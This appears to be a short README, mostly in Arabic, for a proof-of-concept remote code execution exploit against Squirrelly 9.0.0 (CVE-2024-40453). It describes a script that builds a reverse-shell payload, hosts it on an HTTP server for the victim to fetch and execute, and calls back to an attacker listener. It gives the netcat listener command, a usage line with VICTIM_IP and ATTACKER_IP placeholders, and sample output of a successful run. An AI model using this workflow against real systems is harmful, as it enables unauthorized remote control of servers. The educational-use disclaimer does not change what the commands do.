
CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc
هذا البرنامج النصي هو للاستخدام التعليمي فقط.
لا تستخدمه لأغراض غير قانونية.
إذا قمت بذلك، فهذه مسؤوليتك بالكامل؛ لست مسؤولاً عن أي إساءة استخدام.
ينشئ هذا البرنامج النصي شيل عكسي يسمى payload.sh في الدليل الحالي.
ثم يستضيف خادم http على المنفذ 80 ليتمكن الضحية من سحب payload.sh منه.
يجب بدء مستمع على جهاز المهاجم.
يتم إيقاف تشغيل خادم http بعد 3 ثوانٍ للسماح للضحية بسحب وتنفيذ payload.sh
بناءً على المعلومات التالية، تم تطوير هذا الدليل الإثباتي. https://samuzora.com/posts/cve-2024-40453
ابدأ المستمع الخاص بك
rlwrap nc -nvlp 3000
نفذ الحمولة
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!